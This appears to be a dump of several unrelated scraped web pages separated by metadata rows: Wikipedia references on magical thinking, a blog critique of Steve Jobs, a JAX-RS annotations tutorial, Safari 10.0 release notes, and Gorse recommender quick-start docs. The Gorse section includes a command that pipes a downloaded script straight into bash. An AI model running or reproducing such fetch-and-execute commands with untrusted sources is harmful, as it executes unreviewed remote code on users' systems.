Thought) - Mythopoeic thought - Psychology of religion - Psychological theories of magic - Schizotypal personality disorder - Synchronicity - Tinkerbell effect *The Year of Magical Thinking*, an account of how mourning the death of a spouse led to magical thinking ## Notes [edit]**^**The Azande practice of curing epilepsy by eating the burnt skull of a red bush monkey, based on the apparent similarity of epileptic movements and those of the monkeys, was discussed in Evans-Pritchard 1937, p. 487. ## References [edit]- ^ **a****b****c**Bennett, Bo. "Magical Thinking".**d***Logically Fallacious*. Retrieved 20 May 2020. - ^ **a**Carroll RT (12 Sep 2014). "Magical thinking".**b***The Skeptic's Dictionary*. Retrieved 20 May 2020. - ^ **a****b**Robert J. Sternberg; Henry L. Roediger III; Diane F. Halpern (2007).**c***Critical Thinking in Psychology*. Cambridge University Press. ISBN 978-0-521-60834-3. **^**Vamos, Marina (2010). "Organ transplantation and magical thinking".*Australian & New Zealand Journal of Psychiatry*.**44**(10): 883–887. doi:10.3109/00048674.2010.498786. ISSN 0004-8674. PMID 20932201. S2CID 25440192.**^**Carhart-Harris, R. (2013). "Psychedelic drugs, magical thinking and psychosis".*Journal of Neurology, Neurosurgery & Psychiatry*.**84**(9): e1. doi:10.1136/jnnp-2013-306103.17. ISSN 0022-3050.**^**Colman, Andrew M. (2012).*A Dictionary of Psychology*(3rd ed.). Oxford University Press.**^**American Psychiatric Association (2013).*Diagnostic and Statistical Manual of Mental Disorders, Fifth Edition (DSM-5)*. Arlington, VA: American Psychiatric Publishing. pp. 655, 824. doi:10.1176/appi.books.9780890425596. ISBN 978-0-89042-554-1.**^**Sadock, B. J.; Sadock, V. A.; Ruiz, P. (2017).*Kaplan and Sadock's Comprehensive Textbook of Psychiatry*(10th ed.). Wolters Kluwer. ISBN 978-1-4511-0047-1.**^**Fonseca-Pedrero E, Ortuno J, Debbané M, Chan E, Cicero D, Zhang L, Brenner C, Barkus E, Linscott E, Kwapil T, Barrantes-Vidal N, Cohen A, Raine A, Compton M, Tone E, Suhr J, Inchausti F, Bobes J, Fumero A, Giakoumaki S, Tsaousis I, Preti A, Chmielewski M, Laloyaux J, Mechri A, Lahmar M, Wuthrich V, Laroi F, Badcock J, Jablensky A, Isvoranu A, Epskamp S, Fried E (2018). "The network structure of schizotypal personality traits".*Schizophrenia Bulletin*.**44**(2): 468–479. doi:10.1093/schbul/sby044. PMC 6188518. PMID 29684178.**^**Barkataki B (2019).*Explaining obsessive-compulsive symptoms? A transcultural exploration of magical thinking and OCD in India and Australia*(PhD). Curtin university.**^**Glucklich 1997, pp. 59–61, 205–12**^**Glucklich 1997, pp. 53–5**^**Brown, Michael F. (1993).*Thinking About Magic*. Greenwood Press. pp. 5–7.**^**Glucklich 1997, pp. 60–2**^**Glucklich 1997, pp. 49–53**^**Keinan, Giora (2002). "The effects of stress and desire for control on superstitious behavior".*Personality and Social Psychology Bulletin*.**28**(1): 102–108. doi:10.1177/0146167202281009. S2CID 145223253.**^**Keinan, Giora (1994). "The effects of stress and tolerance of ambiguity on magical thinking".*Journal of Personality and Social Psychology*.**67**(1): 48–55. doi:10.1037/0022-3514.67.1.48.- ^ **a**Boyer, Pascal; Liénard, Pierre (2008). "Ritual behavior in obsessive and normal individuals".**b***Current Directions in Psychological Science*.**17**(4): 291–94. CiteSeerX 10.1.1.503.1537. doi:10.1111/j.1467-8721.2008.00592.x. S2CID 145218875. **^**"Why Rituals Work".*Scientific American*. Retrieved 2015-12-17.**^**Glucklich 1997, pp. 50–68**^**Horton, Robin (1967). "African traditional thought and western science: Part I. From tradition to science".*Africa: Journal of the International African Institute*.**37**(1): 50–71. doi:10.2307/1157195. JSTOR 1157195. S2CID 145507695.**^**Horton, Robin (1967). "African traditional thought and western science: Part II. The 'closed' and 'open' predicaments".*Africa: Journal of the International African Institute*.**37**(2): 155–87. doi:10.2307/1158253. JSTOR 1158253. S2CID 245911255.**^**Glucklich 1997, p. 12**^**Lewis, Gilbert.*The Look of Magic*. University of Cambridge.**^**Hamerman, Eric J.; Morewedge, Carey K. (2015-03-01). "Reliance on luck identifying which achievement goals elicit superstitious behavior".*Personality and Social Psychology Bulletin*.**41**(3): 323–335. doi:10.1177/0146167214565055. PMID 25617118. S2CID 1160061.**^**Nisbett, D.; Ross, L. (1980).*Human Inference: Strategies and Shortcomings of Social Judgment*. Englewood Cliffs, NJ: Prentice Hall. pp. 115–8.**^**Glucklich, Ariel (1997).*The End of Magic*. Oxford University Press. pp. 32–3.**^**Evans-Pritchard, E. E. (1977).*Theories of Primitive Religion*. Oxford University Press. pp. 26–7.**^**Evans-Pritchard, E. E. (1937).*Witchcraft, Magic, and Oracles Among the Azande*. Oxford: Clarendon Press.**^**Frazer, James (1915) [1911].*The Golden Bough: A Study in Magic and Religion*(3rd ed.). London: Macmillan.**^**Lévy-Bruhl, Lucien (1925).*How Natives Think*. Knopf. p. 36.**^**Lévy-Bruhl 1925, p. 76**^**Shweder, Richard A. (1977). "Likeness and likelihood in everyday thought: Magical thinking in judgments about personality".*Current Anthropology*.**18**(4): 637–58 (637). doi:10.1086/201974. JSTOR 2741505. S2CID 29780746.**^**Horton 1967b, p. 171**^**Brown, Michael F. (1986).*Tsewa's Gift: Magic and Meaning in an Amazonian Society*. University of Alabama Press.**^**Brown 1993, p. 2**^**Horton 1967b, p. 155**^**Piaget, Jean (1929).*The child's conception of the world*. London: Routledge & Kegan Paul.**^**Nielson, D. (2012). "Discussing death with pediatric patients: Implications for nurses".*Journal of Pediatric Nursing*.**27**(5): e59–e64. doi:10.1016/j.pedn.2011.11.006. PMID 22198004.**^**Samide, L.; Stockton, R. (2002). "Letting go of grief: Bereavement groups for children in the school setting".*Journal for Specialists in Group Work*.**27**(2): 192–204. doi:10.1177/0193392202027002006.**^**Webb, N. (2010). "The child and death". In Webb, N.B. (ed.).*Helping Bereaved Children: A Handbook for Practitioners*. New York: Guildford. pp. 5–6.- ^ **a**Biank, N.; Werner-Lin, A. (2011). "Growing up with grief: Revisiting the death of a parent over the life course".**b***Omega*.**63**(3): 271–290. doi:10.2190/om.63.3.e. PMID 21928600. S2CID 37763796. **^**Webb 2010, p. 51**^**Schoen, A.; Burgoyen, M.; Schoen, S. (2004). "Are the developmental needs of children in America adequately addressed during the grief process?".*Journal of Instructional Psychology*.**31**: 143–8. EBSCOhost 13719052[.*dead link*]**^**Schonfeld, D. (1993). "Talking with children about death".*Journal of Pediatric Health Care*.**7**(6): 269–74. doi:10.1016/s0891-5245(06)80008-8. PMID 8106926.**^**Sossin, K.; Cohen, P. (2011). "Children's play in the wake of loss and trauma".*Journal of Infant, Child and Adolescent Psychotherapy*.**10**(2–3): 255–72. doi:10.1080/15289168.2011.600137. S2CID 146429165.**^**Shafir, E.; Tversky, A. (1992). "Thinking through uncertainty: Nonconsequential reasoning and choice".*Cognitive Psychology*.**24**(4): 449–74. doi:10.1016/0010-0285(92)90015-T. PMID 1473331. S2CID 29570235.**^**Risen, Jane L. (2016). "Believing what we do not believe: Acquiescence to superstitious beliefs and other powerful intuitions".*Psychological Review*.**123**(2): 182–207. doi:10.1037/rev0000017. PMID 26479707. S2CID 14384232. ## Further reading [edit]- Hood, Bruce (2009). *SuperSense: Why We Believe in the Unbelievable*. HarperOne. ISBN 9780061452642. - Horton, Robin (1970). "African traditional thought and western science". In Wilson, Bryan R. (ed.). *Rationality*. Key Concepts in the Social Sciences. Oxford: Basil Blackwell. pp. 131–171. ISBN 9780631119302. Abridged version of Horton (1967a) and Horton (1967b). - Hutson, Matthew (2012). *The 7 Laws of Magical Thinking: How Irrational Beliefs Keep Us Happy, Healthy, and Sane*. Hudson Street Press. ISBN 9781594630873. - Serban, George (1982). *The Tyranny of Magical Thinking*. New York: E. P. Dutton. ISBN 9780525241409. This work discusses how and why the magical thinking of childhood can carry into adulthood, causing various maladaptions and psychopathologies. - Vyse, Stuart (1997). *Believing in Magic: The Psychology of Superstition*. Oxford University Press. ISBN 9780195136340. ## External links [edit]- Hutson, Matthew (2008). "Magical thinking". *Psychology Today*. Vol. March–April. pp. 89–95. - Stevens, Phillips Jr. (November–December 2001). "Magical thinking in complementary and alternative medicine". *Skeptical Inquirer*.**25**(6). Archived from the original on 2010-06-03. Retrieved 2010-09-22.
true
true
true
null
2024-10-12 00:00:00
2003-02-19 00:00:00
null
website
wikipedia.org
Wikimedia Foundation, Inc.
null
null
1,574,600
http://www.technologyreview.com/computing/25924/?a=f
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
3,179,553
http://harry-lewis.blogspot.com/2011/10/bit-of-nuance-on-steve-jobs.html
A bit of nuance on Steve Jobs
Harry Lewis
I actually thought that within a day of his death, but restrained myself out of respect. *De mortuis nil nisi bonum.* The statute of limitations having now run out, I'd like to add a few words. First on the plus side. Jobs was a design genius. His resolute insistence on simplicity and cleanliness wasn't a new thing in technology, but it was a new thing in computer technology. The over-complication of Microsoft software created a huge target to shoot at, but Jobs did not stop at being better. He really did have a genius for reducing things to their intuitive essentials and not accepting anything less. So of all the tributes, I like Ross Douthat's in today's NYT the best. Nobody would have said that a computer was beautiful before Apple products. The all-white IBM Charlie Chaplin ads tried to make you think that PCs were beautiful, but they weren't. And one of Jobs's greatest successes has not gotten a lot of press: The iTunes business model. He jerked the music industry into the Internet age and found a way for everyone to make money by selling singles for $.99. That was a stunning development given the rigid conservatism of the music industry's selling-plastic business model. (But see Dan Gillmor for appropriate reservations where this success is taking us.) Having said all that, I would add three reservations. First, Jobs was not a technological innovator in any significant sense. As has been told many times (though not often in the past week), the snappy, intuitive Mac interface was invented at the Xerox Palo Alto Research Center. Jobs oversaw the process of squeezing it down to fit in a box with 128K of memory and no hard drive. Those first Macs barely ran, but they got the ball rolling. There are many other examples. I toured the Mac assembly line in early 1984 -- the manufacturing technology was Japanese and had never been used in the US the way Apple was using it. So part of Jobs's genius was recognizing the potential in other people's inventions, and executing the consolidation and integration of those developments. Of course, this is not really a negative. The world is full of examples of inventions that changed the world due to the genius of the executor, not the inventor. (Think Facebook.) Second, Jobs's uncompromising insistence on simplicity sometimes got the better of him. When the Mac was designed, it was a courageous decision to insist on a one-button mouse. That was the source of some ridicule at the time (as well as some admiration). PCs already had two-button mice and there were experiments with 3-button mice. In this case the insistence on simplicity was right. But Jobs also insisted on a keyboard with no function keys. That pretty much cost Apple the business market, because Excel users needed function keys. I felt sorry for the true-believing Apple salespeople trying to sell Macintoshes into the workplace. Except for graphic design, it was a non-starter. So in this instance at least, the refusal to compromise was short-sighted. The course of computer history would have been different if Jobs had put function keys on the early Mac keyboards. And finally, I am glad to learn that Jobs was a good family man, but he wasn't always a nice person to the people who worked for him and who challenged his absolute authority. Perhaps some of those people have already written about their experiences or will do so shortly. And even with family members, it wasn't always all love all the time--for years he refused even to acknowledge his first child. Perhaps I am being churlish to note any of these things, but as Tom Lehrer said, if you don't like my song, you should never have let me begin! Even after reading this nuance view of him I still think highly of him. The Halo affect after someone dies is a bad thing- then there is backlash. Better to have an honest appraisal in the first place. ReplyDeleteTHANKS HARRY! I think it is unfair to say that he was "not a technical innovator in any significant sense". ReplyDeleteHe definitely was not a researcher or an inventor, but innovation is a much broader term than that. It includes not just inventing new ideas, but also bringing other people's ideas to market in a way that brings new value and changes the market. Apple has certainly done that, and Steve played a big role in directing that innovation.
true
true
true
I think the canonization of Steve Jobs is getting a little tiresome. I actually thought that within a day of his death, but restrained mys...
2024-10-12 00:00:00
2011-10-09 00:00:00
null
null
blogspot.com
harry-lewis.blogspot.com
null
null
2,533,687
http://thenextweb.com/video/2011/05/10/apple-baby-aza-raskin-on-the-secrets-of-great-user-interface/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
5,786,263
http://www.wired.com/threatlevel/2013/05/google-pharma-whitaker-sting/?1
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
40,316,919
https://www.pravda.com.ua/eng/news/2024/05/10/7455130/
Ukraine’s Air Force receives first F-16 fighter jet trainer – video
VALENTYNA ROMANENKO
# Ukraine's Air Force receives first F-16 fighter jet trainer – video Czechia has handed over the first F-16 fighter jet simulator to one of Ukraine’s tactical aviation brigades, and its main module is being tested and prepared for operation by Ukrainian engineers. **Source:** Commander of the Ukrainian Air Force Lieutenant General Mykola Oleshchuk on Telegram; press service for Air Force Command **Quote: **"I thank everyone who is helping Ukraine strengthen its aircraft component. Of course, in addition to the F-16s themselves, we need to create a strong supply of training equipment for our youth. I urge our allies to join this initiative." **Details:** The Air Force explains that this is not a simulator, but a full-fledged flight simulator with a real F-16 cockpit. Hydraulics will be installed next, so that the pilot will get the most realistic experience during training flights. **Background:** - Media outlets reported that the first F-16 fighter jets would appear in the Ukrainian skies around June 2024. - The Belgian government recently approved a 25th support aid package for Ukraine, which includes funds for maintaining F-16s. **Support**** UP or become** **our patron****!**
true
true
true
Czechia has handed over the first F-16 fighter jet simulator to one of Ukraine’s tactical aviation brigades, and its main module is being tested and prepared for operation by Ukrainian engineers.
2024-10-12 00:00:00
2024-05-10 00:00:00
https://img.pravda.com/i…_10_13_34_47.jpg
article
pravda.com.ua
Ukrainska Pravda
null
null
9,162,800
http://codeforces.com/blog/entry/15547
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,270,295
https://readlearncode.com/java-ee/what-are-the-jax-rs-annotations-queryparameter-produces-consumes/
What are JAX-RS Annotations?
Alex
# What are JAX-RS Annotations? ## Overview of JAX-RS Annotations (Part 3) This is a three-part series looking at the annotation that is used to implement REST endpoints. In part one of JAX-RS annotations you learn about: - The @Path Annotation (again) and @PathParam - The @QueryParamter Annotation - The @Produces Annotation - The @Consumes Annotation In this part, you will learn more about JAX-RS annotations. Are you ready, so let’s get started. ### The @FormParam Annotation You may need to read parameters sent in a POST HTTP requests directly from the body, rather than serializing it to an object. This can be done by using the *@FormParam* annotation. @POST @Produces(MediaType.APPLICATION_JSON) public Response saveBookF(@FormParam("title") String title, @FormParam("author") String author, @FormParam("price") Float price) { return Response.ok(bookRepository.saveBook(new Book(title, author, price))).build(); } ### The @MatrixParam Annotation Matrix parameters are a set of query parameters separated by a semicolon rather than an ampersand. This may occur because the values were selected from a multiple select input box and being set via a GET request rather than a POST request. The URL might look something like this: http://localhost:8080/api/books;author=atheedom;category=Java;language=english The annotation *@MatricParam* is used to retrieve the parameter value from the URI and assign it to a method parameter. @GET @Produces(MediaType.APPLICATION_JSON) public Response getBookBy(@MatrixParam("author") String author, @MatrixParam("category") String category, @MatrixParam("language") String language) { return Response.ok( new GenericEntity<List<Book>>( bookRepository.getBookBy(author, category, language)) {}).build(); } ### The @CookieParam Annotation The *@CookieParam* annotation allows you to inject directly into your resource method cookies sent by the client. Imagine you have sent a cookie called *cartId* to the clients so that you can track the customer’s shopping cart. To pull the cookie from the HTTP request just annotate the method parameter to which you want the cookie data to be assigned. @GET @Produces(MediaType.APPLICATION_JSON) public Response getCart(@CookieParam("cartId") int cartId) { return Response.ok().build(); } ### The @HeaderParam Annotation The *@HeaderParam* annotation is used to inject HTTP request header values into resource method parameters. You can think of it like a shortcut to using the *@Context* annotation to inject the HttpServletRequest or HttpHeaders instance. @GET @Produces(MediaType.APPLICATION_JSON) public Response getReferrer(@HeaderParam("referer") String referrer) { return Response.ok(referrer).build(); } ### The @Provider Annotation Providers are used to extend and customize JAX-RS by altering the behavior of the runtime to achieve a set of goals. There are three types of providers: **Entity Providers** This type of provider controls the mapping of data representations, such as JSON and XML, to their object equivalents**Context Providers** This type of provider controls the context that resources can access with the @Context annotation**Exception Providers** This type of provider controls the mapping of Java exceptions to a JAX-RS Response instance. The only thing they have in common is that they must be identified by the *@Provider* annotation and follow the correct rules for constructor declaration. ### Code Repository The source code for this article is in my GitHub repository. Code for all my articles is in the ReadLearnCode Articles repository. ## Further Reading If you are interested in reading more about the **JAX-RS API** then these articles will interest you: **Bean validation failure management**discusses how to handle response to clients when input fails data integrity checks- Discover all the uses of the **@javax.ws.rs.core.Context****annotation** - working with **@Consumes and @Produces annotations**, and **JAX-RS Resource Entities**discusses how to create JAX-RS resource entities ## Learn More If you want to level up your Java EE skills you considered my online video training course. I cover a range of topics from the Java EE platform including: - how to develop an online bookshop using **RESTful APIs**, - how develop your own chat application with the **WebSocket API**and - how to become a JSON ninja with the **JSON-Processing** However, if you are taking your first flurry into the awesome world of enterprise Java development, then you will want to take my course **Learning Java Enterprise Edition**. It is a chock-a-block 2hrs course covering all the most important APIs in the Java EE ecosystem. Thanks, nice post
true
true
true
Overview of JAX-RS Annotations (Part 3) This is a three-part series looking at the annotation that is used to implement REST endpoints. In part one of JAX-RS annotations you learn about: The @Path …
2024-10-12 00:00:00
2017-08-28 00:00:00
https://i0.wp.com/readle…=640%2C426&ssl=1
article
readlearncode.com
Digital Transformation and Java Video Training
null
null
36,536,087
https://www.adexchanger.com/online-advertising/mediamath-files-for-bankruptcy-after-acquisition-talks-fall-apart/
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
12,542,029
https://developer.apple.com/library/content/releasenotes/General/WhatsNewInSafari/Articles/Safari_10_0.html
How helpful is this document?
null
# Safari 10.0 The following new features have been added in Safari 10.0. ## Web APIs ### IndexedDB Support Safari’s IndexedDB implementation now fully supports the recommended standard. You may now use the API to store structured data for web applications that work offline or that require large amounts of client-side data caching. ### Programmatic Cut and Copy Support Use JavaScript commands to programmatically cut and copy text to the clipboard with `document.execCommand('cut')` and `document.execCommand('copy')` . ### CSP 2.0 Content Security Policy (CSP) support has been enhanced by including version 2.0 of the standard. ### Shadow DOM Version 1 of the Shadow DOM standard provides the foundation for Web Components. You can take advantage of Shadow DOM to encapsulate functionality without worrying about conflicts between scripts and styles on the page. ### ES6 The ECMAScript 2015 standard, also known as ES6, is completely supported, bringing this major JavaScript evolution to Safari on macOS and iOS. ### ES Internationalization Integration of the ECMAScript Internationalization API standard, also known as ECMA-402, supports client-side number, currency, and date-formatting that honors the user’s language and locale or uses a provided language and locale. ### DOM Compatibility Improvements Many fundamental browser- and site-compatibility improvements now ensure that Safari 10 passes even more World Wide Web Consortium (W3C) tests and is compatible with other browsers. ### 3D Touch Events For 3D Touch on iOS, the `touchforcechange` event is called only when the force changes. The event is the 3D Touch equivalent of `webkitmouseforcechanged` for WebKit in macOS. The values of the `force` property of `touch` objects range from `0.0` to `1.0` . ### WebGL The `antialias` context creation parameter is now supported in iOS. It defaults to`true` .The `alpha` context creation parameter now supports the value`false` in iOS.The total number of active WebGL contexts on a page is limited to 16. After that limit is reached, adding a new context causes the oldest context to be destroyed. ### Geolocation Starting in Safari 10.0, unencrypted websites can no longer access Geolocation APIs. You must use a secure connection in order to access Geolocation APIs. ## Media ### Inline and Auto Video Playback in iOS When the `playsinline` property is specified, Safari on iPhone allows videos to play inline. Videos without the property will commence playback in fullscreen, but users can pinch close on the video to continue playing the video inline.On iOS, videos without audio tracks or with disabled audio tracks can play automatically when the webpage loads. ### Picture in Picture in macOS Safari 10 brings Picture in Picture to macOS so users can watch video in a separate, resizable window that stays on top of other application windows and remains on-screen when switching desktop spaces. Safari's default HTML5 video controls includes a new Picture in Picture control. If you use custom HTML5 video controls, you can add Picture in Picture functionality using the JavaScript presentation mode API. ## Text Features ### WOFF 2.0 Support Web Open Font Format (WOFF) 2.0 support in Safari on macOS 10.12 and iOS 10 improves compression of website fonts, so fonts require less bandwidth to load. ### Font Loading Web developers can use the CSS Font Loading Module Level 3 specification to create and load font faces from a script and track the loading status of fonts. Web fonts are downloaded only if the characters of the rendered text are within the font's Unicode range. ## Layout and Rendering ### CSS Support for Object Position The `object-position` property controls where content in replaced elements—such as `video` , `img` , and `object` —are positioned inside the containing box element. The and `object-position` `background-position` properties are used in a similar way. ### Support Clipping Using SVG Paths You can clip to more sophisticated shapes, including Bezier path segments and the `evenodd` fill rule, by using a `path()` shape, as specified in the CSS Shapes Level 2 specification. ### Support for #RGBA and #RRGGBBAA Safari accepts `#RGBA` and `#RRGGBBAA` color values as described in the CSS Color Level 4 specification. ### New Values for Border Image The `round` and `space` values for the `border-image` CSS property are supported. ### New Values for Image Rendering Support is available for `crisp-edges` and `pixelated` values for the `image-rendering` property. The prefixed values `-webkit-crisp-edges` and `-webkit-optimize-contrast` map to the `crisp-edges` value. ### Right-to-Left Language Support The location of scrollbars and the appearance of form controls are adjusted based on the `direction` CSS property. ### Media Query for Wide Color Gamut Support A media query added to CSS or picture elements provides different presentation styles when content is displayed on a device with a wide color gamut, such as the Display P3 color space. `@media (color-gamut: p3) { … }` ### CSS Break Properties The `break-after` , `break-before` , and `break-inside` CSS properties are now supported. ### Unprefixed CSS Features The following CSS features are supported without the `-webkit-` prefix. `filter` `cross-fade` `image-rendering` ### Accessibility Pinch-to-zoom is always enabled for all users. The viewport setting for `user-scalable` is ignored. ## Web Inspector ### WebDriver Support Safari on macOS supports `WebDriver` , which lets you automate web-content testing. It provides a set of interfaces to manipulate DOM elements and control the browser’s behavior. You can enable Remote Automation in the Develop menu and then launch the server using `/usr/bin/safaridriver` . For information about library integrations as they become available, see the information about Selenium WebDriver. ### Memory Debugging Web Inspector includes new timelines to visualize web application memory usage and plots heap allocation snapshots over time. These tools help you identify areas to improve for optimal memory performance. ### Fast Sampling Profiler The new JavaScript profiler delivers fast performance by sampling running code at a high resolution while disabling debugging tools. It allows scripts to run at full JIT-accelerated (just-in-time compilation) speeds for accurate timeline recording. ## Native APIs ### Apple Pay for the Web You can give customers an easy, secure, and private way to pay for physical goods and services—such as groceries, clothing, tickets, reservations, and more. Users can check out with a single touch using Apple Pay with Touch ID on their iPhone, or by double-clicking the side button on Apple Watch. To incorporate Apple Pay into your websites, see *ApplePay JS Framework Reference*. ### WKWebView Preview Actions The updated `WKWebView` API supports link previews that display a custom view controller. With this API, you can create views using Peek and Pop inside your app instead of popping to Safari, and you can specify custom preview actions. The new methods are part of the`WKUIDelegate` class—`webView:shouldPreviewElement:` ,`webView:previewingViewControllerForElement:defaultActions:` , and`webView:commitPreviewingViewController:` .The `WKWebView` .`allowsLinkPreview` property defaults to`YES` in apps for iOS 10.0 or later. ### Safari View Controller Safari View Controller on iOS 10 now supports color tinting for view bar backgrounds. Combined with the color tinting of UI control elements (available in iOS 9), Safari View Controller can be customized to provide your users a cohesive look for their in-app experience. ### WKWebView Behavior with Keyboard Displays Safari and `WKWebView` on iOS 10 do not update the `window.innerHeight` property when the keyboard is shown. On previous versions of iOS `WKWebView` would update the `window.innerHeight` property when the keyboard is shown. ## Safari App Extensions You can now create macOS-native Safari app extensions to sell and distribute in the App Store. Content Blockers for iOS can be easily ported to macOS; macOS apps can extend into Safari; and injected scripts and applied styles can extend web content. To get started with extensions, see *Safari App Extension Programming Guide*.The `make-https` action is now available for iOS content blockers. The action changes a URL from`http` to`https` before making a server request. URLs with a specified port (other than the default port 80) and links using other protocols are not affected. Copyright © 2018 Apple Inc. All Rights Reserved. Terms of Use | Privacy Policy | Updated: 2018-02-22
true
true
true
Describes new features introduced in versions of Safari.
2024-10-12 00:00:00
2018-02-22 00:00:00
null
null
null
Copyright 2018 Apple Inc. All Rights Reserved.
null
null
38,475,950
https://gorse.io/
Home
null
### Multi-source Recommend items from Popular, latest, user-based, item-based and collaborative filtering. ### AutoML Search the best recommendation model automatically in the background. ### Distributed prediction Support horizontal scaling in the recommendation stage after single node training. ### RESTful APIs Expose RESTful APIs for data CRUD and recommendation requests. ### Multi-database support Support Redis, MySQL, Postgres, MongoDB, and ClickHouse as its storage backend. ### Online evaluation Analyze online recommendation performance from recently inserted feedback. ### Dashboard Provide GUI for data management, system monitoring, and cluster status checking. ### Open source The codebase is released under Apache 2 license and driven by the community. Gorse is an open-source recommendation system written in Go. Gorse aims to be a universal open-source recommender system that can be easily introduced into a wide variety of online services. By importing items, users and interaction data into Gorse, the system will automatically train models to generate recommendations for each user. # Quick Start The playground mode has been prepared for beginners. Just set up a recommender system for GitHub repositories by following the commands. ``` curl -fsSL https://gorse.io/playground | bash ``` ``` docker run -p 8088:8088 zhenghaoz/gorse-in-one --playground ``` The playground mode will download data from GitRec and import it into Gorse. The dashboard is available at http://localhost:8088. After the "Find neighbors of items" task is completed on the "Tasks" page, try to insert several feedbacks into Gorse. Suppose Bob is a frontend developer who starred several frontend repositories in GitHub. We insert his star feedback to Gorse. ``` read -d '' JSON << EOF [ { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"vuejs:vue\", \"Timestamp\": \"2022-02-24\" }, { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"d3:d3\", \"Timestamp\": \"2022-02-25\" }, { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"dogfalo:materialize\", \"Timestamp\": \"2022-02-26\" }, { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"mozilla:pdf.js\", \"Timestamp\": \"2022-02-27\" }, { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"moment:moment\", \"Timestamp\": \"2022-02-28\" } ] EOF curl -X POST http://127.0.0.1:8088/api/feedback \ -H 'Content-Type: application/json' \ -d "$JSON" ``` ``` import "github.com/zhenghaoz/gorse/client" gorse := client.NewGorseClient("http://127.0.0.1:8088", "") gorse.InsertFeedback([]client.Feedback{ {FeedbackType: "star", UserId: "bob", ItemId: "vuejs:vue", Timestamp: "2022-02-24"}, {FeedbackType: "star", UserId: "bob", ItemId: "d3:d3", Timestamp: "2022-02-25"}, {FeedbackType: "star", UserId: "bob", ItemId: "dogfalo:materialize", Timestamp: "2022-02-26"}, {FeedbackType: "star", UserId: "bob", ItemId: "mozilla:pdf.js", Timestamp: "2022-02-27"}, {FeedbackType: "star", UserId: "bob", ItemId: "moment:moment", Timestamp: "2022-02-28"}, }) ``` ``` from gorse import Gorse client = Gorse('http://127.0.0.1:8088', '') client.insert_feedbacks([ { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'vuejs:vue', 'Timestamp': '2022-02-24' }, { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'd3:d3', 'Timestamp': '2022-02-25' }, { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'dogfalo:materialize', 'Timestamp': '2022-02-26' }, { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'mozilla:pdf.js', 'Timestamp': '2022-02-27' }, { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'moment:moment', 'Timestamp': '2022-02-28' } ]) ``` ``` import { Gorse } from "gorsejs"; const client = new Gorse({ endpoint: "http://127.0.0.1:8088", secret: "" }); await client.insertFeedbacks([ { FeedbackType: 'star', UserId: 'bob', ItemId: 'vuejs:vue', Timestamp: '2022-02-24' }, { FeedbackType: 'star', UserId: 'bob', ItemId: 'd3:d3', Timestamp: '2022-02-25' }, { FeedbackType: 'star', UserId: 'bob', ItemId: 'dogfalo:materialize', Timestamp: '2022-02-26' }, { FeedbackType: 'star', UserId: 'bob', ItemId: 'mozilla:pdf.js', Timestamp: '2022-02-27' }, { FeedbackType: 'star', UserId: 'bob', ItemId: 'moment:moment', Timestamp: '2022-02-28' } ]); ``` ``` import io.gorse.gorse4j.*; Gorse client = new Gorse(GORSE_ENDPOINT, GORSE_API_KEY); List<Feedback> feedbacks = List.of( new Feedback("star", "bob", "vuejs:vue", "2022-02-24"), new Feedback("star", "bob", "d3:d3", "2022-02-25"), new Feedback("star", "bob", "dogfalo:materialize", "2022-02-26"), new Feedback("star", "bob", "mozilla:pdf.js", "2022-02-27"), new Feedback("star", "bob", "moment:moment", "2022-02-28") ); client.insertFeedback(feedbacks); ``` ``` use gorse_rs::{Feedback, Gorse}; let client = Gorse::new("http://127.0.0.1:8088", ""); let feedback = vec![ Feedback::new("star", "bob", "vuejs:vue", "2022-02-24"), Feedback::new("star", "bob", "d3:d3", "2022-02-25"), Feedback::new("star", "bob", "dogfalo:materialize", "2022-02-26"), Feedback::new("star", "bob", "mozilla:pdf.js", "2022-02-27"), Feedback::new("star", "bob", "moment:moment", "2022-02-28") ]; client.insert_feedback(&feedback).await; ``` ``` require 'gorse' client = Gorse.new('http://127.0.0.1:8088', 'api_key') client.insert_feedback([ Feedback.new("star", "bob", "vuejs:vue", "2022-02-24"), Feedback.new("star", "bob", "d3:d3", "2022-02-25"), Feedback.new("star", "bob", "dogfalo:materialize", "2022-02-26"), Feedback.new("star", "bob", "mozilla:pdf.js", "2022-02-27"), Feedback.new("star", "bob", "moment:moment", "2022-02-28") ]) ``` ``` $client = new Gorse("http://127.0.0.1:8088/", "api_key"); $rowsAffected = $client->insertFeedback([ new Feedback("star", "bob", "vuejs:vue", "2022-02-24"), new Feedback("star", "bob", "d3:d3", "2022-02-25"), new Feedback("star", "bob", "dogfalo:materialize", "2022-02-26"), new Feedback("star", "bob", "mozilla:pdf.js", "2022-02-27"), new Feedback("star", "bob", "moment:moment", "2022-02-28") ]); ``` ``` using Gorse.NET; var client = new Gorse("http://127.0.0.1:8087", "api_key"); client.InsertFeedback(new Feedback[] { new Feedback{FeedbackType="star", UserId="bob", ItemId="vuejs:vue", Timestamp="2022-02-24"}, new Feedback{FeedbackType="star", UserId="bob", ItemId="d3:d3", Timestamp="2022-02-25"}, new Feedback{FeedbackType="star", UserId="bob", ItemId="dogfalo:materialize", Timestamp="2022-02-26"}, new Feedback{FeedbackType="star", UserId="bob", ItemId="mozilla:pdf.js", Timestamp="2022-02-27"}, new Feedback{FeedbackType="star", UserId="bob", ItemId="moment:moment", Timestamp="2022-02-28"}, }); ``` Then, fetch 10 recommended items from Gorse. We can find that frontend-related repositories are recommended for Bob. ``` curl http://127.0.0.1:8088/api/recommend/bob?n=10 ``` ``` gorse.GetRecommend("bob", "", 10) ``` ``` client.get_recommend('bob', n=10) ``` ``` await client.getRecommend({ userId: 'bob', cursorOptions: { n: 10 } }); ``` ``` client.getRecommend("bob"); ``` ``` client.get_recommend("bob").await; ``` ``` 